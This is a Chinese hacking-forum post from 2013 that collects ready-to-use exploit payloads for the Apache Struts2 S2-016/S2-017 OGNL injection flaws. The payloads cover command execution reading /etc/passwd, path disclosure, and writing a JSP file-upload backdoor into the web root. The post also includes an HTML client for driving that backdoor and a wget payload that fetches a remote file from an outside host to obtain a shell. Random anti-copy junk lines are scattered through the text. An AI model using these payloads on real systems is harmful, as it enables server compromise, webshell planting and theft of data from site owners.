中国网络渗透测试联盟
标题:
Struts2 S2-016/S2-017漏洞执行代码
[打印本页]
作者:
admin
时间:
2013-7-18 23:03
标题:
Struts2 S2-016/S2-017漏洞执行代码
大家都发了,,我就整理了一下。友情提示,自己小命比shell重要哦。。
( d& Z# T/ V% f s& b+ J
C& ]( S! K8 z& _" a$ w) H, I7 N
喜欢就点一下感谢吧^_^
4 d4 E' |8 E8 e0 i: @7 E: T, @' z' n
; C0 j0 a7 h; P: l$ {3 k
带回显命令执行:
3 c6 z# M, F7 L$ i
- h0 \0 l7 h* V8 }# @
http://www.example.com/struts2-blank/example/X.action?redirect:
${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'cat','/etc/passwd'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}
3 j- Q# }2 G( c2 L7 @1 _% S, q
$ a, U: w ~, |7 M6 r6 c4 ]$ Q
! ^$ h* K' a7 ]0 e5 r9 v. S; y
/ f q# G: O) t/ B: O
, O- c$ \5 j1 u/ {/ h" N
2 z# f( D& [7 M: V& R, F
8 b# }( A) E, V: P7 k! Q. @
# X$ G- H0 M$ a y" u5 H0 s
爆路径:
( `5 U9 L$ K- f; \' @7 b- h
0 o$ w0 s# W8 E6 o* }$ R2 p
http://www.example.com/struts2-b ... 8%29.close%28%29%7D
& F5 [* Q& U1 L& Q7 Y% G
7 S2 H8 m2 R* W% F4 d; r2 [4 O
' T/ F W! d2 X* F3 f
1 M+ ?6 S* [+ H# H! i, C
! z: e" h% c) m- s( V1 D
8 Q0 n& _! B2 A
写文件:
9 U1 b, ~" j) }7 {' p
% F9 W0 C C5 \9 _ p1 H
http://www.example.com/struts2-blank/example/X.action?redirect:
${
1 e$ b* Q b1 l0 i. y- `3 F
5 e: w* g4 Z, P& U" Y. O
%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),
3 k/ L3 c0 c8 ~ X, K
% H3 {0 f' L4 z, v
%23p%3d(%23req.getRealPath(%22/%22)%2b%22css3.jsp%22).replaceAll("\\\\", "/"),
4 H5 G) ~2 m% A" ~6 ?
4 @% O3 E) v4 {( O3 v
new+java.io.BufferedWriter(new+java.io.FileWriter(%23p)).append(%23req.getParameter(%22c%22)).close()
8 S: h0 G6 p! _) _2 _
1 @6 e- i4 _0 O. Q6 Q
}&c=%3c%25if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%2f%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b%25%3e
" U# _. C9 Q* D( J( z; B: O7 i
+ g* w5 h' o c$ @
& e6 M( u0 M) M: c! c0 r/ w9 L; r
' H6 E( E; U* h) k2 ]3 G7 n3 y
写入的文件内容:
J. ]3 M, f/ g- h. ?+ K
3 w+ O6 T% g5 J2 d# G# j
<%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>
$ @' ~' M0 x2 p, S
, L( |( i3 L/ [, t9 Y# c% O8 W
其实就是一个jsp的小马,需要客户端配合
+ ?. P" a5 J$ J' s1 O; B6 _. o
( k' n) ?; O' U$ n" a2 E/ h2 B
函数f是文件名,t是内容
, [1 P; E4 N$ K U( Q
/ v8 }6 ?' R9 ~# k
客户端:
- L6 ^# h; B' U
- ^, V, E- A3 w* P5 P4 X* @7 o
<form action="http://www.example.com/struts2-blank/example/css3.jsp?f=fjp.jsp" method="post">
: t0 ]! h: D: v2 X% x
% P. N' z0 t5 @/ Z% {" Q6 h' T# k
<textarea name=t cols=120 rows=10 width=45>your code</textarea>
y; M M+ j) ]4 Y
# O @1 o, O% s% R/ ]
<center>
- g) i+ Z& @& w* ]8 J# M- q8 J+ r
6 c! Q% T5 v1 z' c U- L$ o( g
1 D& H; d& K/ q o7 Y
- P1 ?( e3 W8 k' j7 }# I
<input type=submit value="提交">
% B# O2 n: W# G
5 w* ^9 t2 O! B' y/ T
</form>
' K/ Z. Q) b$ G1 Y7 p5 d
' j+ K" d. W- ^. g% V
就在当前目录建立一个fjp.jsp
, G0 h( b% f; I/ R/ z- L
8 u, p7 o1 n+ h
shell:
http://www.example.com/struts2-blank/example/fjp.jsp
0 i$ t9 S4 ~6 g% G9 a( ]
, ~' a% b- X0 c M$ y; `
! W5 \% t- Y) B/ I$ P5 Q
* q% _0 A5 w) z+ l# f; M- w
还有@园长的一个客户端:
* b9 m. ^/ Q5 O/ P- T/ \- _; [
9 I% m2 B& Q2 O3 e+ D
<html>
+ E2 B1 }) z: N
: s; A6 T5 ~: \' ~) u8 o
<head>
. |6 h) s, L p
6 J) l8 P! O9 w: ]
<meta http-equiv="content-type" content="text/html;charset=utf-8">
0 [0 }! ~) q0 P, A
7 T. a: B7 H1 e9 w5 j, V8 e+ m
<title>jsp-园长</title>
4 x2 ]! Z. }7 c! p
3 j. n0 G! v" P9 @5 k+ u( O* w, R+ d
</head>
7 b. Q+ p$ z. K
0 _ X# x! \5 \7 I( H
<style>
8 F0 d) e6 E* E2 p- _. T: ^
$ M1 r$ t. m+ ?7 q1 L
.main{width:980px;height:600px;margin:0 auto;}
- i' E" ~: U7 i# t2 o3 j5 a' o
6 C/ V: M. p# h8 m. T( n: G$ G
.url{width:300px;}
3 `! C" _- d$ U8 ~3 M
: U& T' P7 q( L! Z- {- T
.fn{width:60px;}
; e+ S; w2 t- H6 |
' _6 e8 L r- @3 R; V. I. m- N
.content{width:80%;height:60%;}
2 ^# J2 @; i+ P7 t- O/ V
, M' `. l* R: x- |$ C% a% p( _( H, ~
</style>
) _2 }5 {# }; c& J2 _; H2 D
/ P1 W' ~8 [4 f- |0 `
<script>
! O$ T9 c9 a0 c9 ^9 l
: `3 [0 f! J/ @4 M5 w2 e6 F
function upload(){
. {% t M' S9 M0 r3 w1 W% ^
& a7 C2 H# b" j2 V1 h! a
var url = document.getElementById('url').value,
+ y% n2 _0 R% r
4 Y D; I* I; `, f. `
content = document.getElementById('content').value,
& @5 q% N' G8 c! ~5 @$ O. v
* G4 ~/ P, ^2 D/ o
fileName = document.getElementById('fn').value,
# ]1 R5 H2 [5 R: @1 m0 v+ Z
; L; T7 x+ C# W% `, v
form = document.getElementById('fm');
" U- w, L4 i. @* y/ |* z
1 a4 X* b. K1 j7 L; D
if(url.length == 0){
9 S2 b3 g9 n3 D9 g/ J$ p8 D
# _* K2 P1 g8 x& w' V
alert("Url not allowd empty!");
' [1 P, b" C c- W6 b$ e! J3 V
" n- m+ r2 x0 R+ I' L& R
return ;
- n2 l8 h. U( p0 \, \) X1 z
I+ _5 Z& c' m" z7 K/ A
}
/ x4 g; U$ J* `
0 Z' p4 O8 f9 e! k
if(content.length == 0){
' N/ M- X: e. C) ]4 g8 f2 m
0 z) g$ G* B/ |
alert("Content not allowd empty!");
' L) w1 b6 p. K( v2 G. f' e( g; b
8 o4 ^% l( O2 n2 X, c
return ;
$ D5 d' q% [) | f+ D4 T
0 \' l' v; J" Q
}
$ U5 Z% s: E' v0 }: T
: J! {5 h2 q1 Z. B
if(fileName.length == 0){
5 E- h# o0 ^$ F+ F
\4 d/ _" g- M8 L9 k# |5 o
alert("FileName not allowd empty!");
: o' m9 z' u7 i' Y, I* D/ U
6 T) g1 D& E- j" w! {
return ;
! `/ q" B% E! q/ N! ]
* {7 U% E9 ?' e# C) o$ Y3 C
}
6 |: l3 v" B( O e4 X/ i
, [+ a4 a3 q' ]6 D) R/ A
form.action = url;
' A# L6 R( r8 s5 _$ R7 b& s( z% p. O
9 [! X) J8 y2 `
form.submit();
' D+ B) O/ ]. o2 F! b0 r
1 N2 a F' i; w2 w4 A( i1 O
}
7 V! d/ W5 ^+ T4 x% \3 j! U
5 y$ Q. `( X- R; `! U8 C
</script>
: a% x7 |6 I+ g; l
. T. } o0 ^ I6 |1 j8 x; _
<body>
; u& m& D5 x2 _" v
; F8 F$ S, W# D
<div class="main">
. w. F$ l1 {1 x3 o! R" K8 W' L
% r4 a0 K/ L: L% x
<form id="fm" method="post">
4 V2 y5 I% B/ O* [, T
4 H( D, {! `$ [9 s& `6 n) J# A, {
URL:<input type="text" value="http://localhost/Struts2/css3.jsp" class="url" id="url"/>
# l5 A+ Q$ `3 u: ^
7 @) \! p/ ?4 a2 A4 N0 q
FileName:<input type="text" name="f" value="css.jsp" class="fn" id="fn" />
2 q& p; r0 J8 E8 T* J$ y5 W
. J3 s' d) m3 C* M
<a href="javascript:upload();">Upload</a>
, O+ t. Z" I% n$ k7 X9 Q/ L8 n5 `
4 r8 \. T/ X% Y& p
e5 K$ F. O i0 d& P
$ Q, P+ q$ l2 m1 S) T
<textarea id="content" class="content" name="t" ></textarea>
; y7 D) Q9 J- z+ V% J
2 W) ]1 x2 \% K9 ]' H
</form>
' T0 J' U/ T, @! _
) U6 l9 W) M* R* p0 J& \
</div>
5 L, ~! X- B# N) j$ U( m' ?( j" n! p
1 m) J( Y6 P2 d. G1 @
</body>
) o6 G. {4 j. A/ c
. n2 J2 b# j. ?* P/ p$ I( C. J8 R
</html>
4 }# c: u& B$ I: Z
0 W/ _' F" U! m8 O, F# }3 w9 b" F
6 {- v+ o! n& F3 z9 q& ]) C
7 Q* \( [: q7 i' k( A3 x
还有@X发的一个wget的getshell
" C: s$ }( ]1 V, R# N
4 p5 E$ G: z- A* F: o* ~
?redirect
{%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'wget','http://www.url.com/xx.txt','- O','/root/1.jsp'}
r; ? L( |8 }+ \
8 c3 J& n3 V' M5 t$ R+ ]
)).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b), %23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e), %23piaoye%3d%23context.get ('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23piaoye.getWriter().println (%23e),%23piaoye.getWriter().flush(),%23piaoye.getWriter().close()}
# A f& b4 Y) z+ ~: t' u. C, y
复制代码
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2
{%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'wget','http://www.url.com/xx.txt','- O','/root/1.jsp'}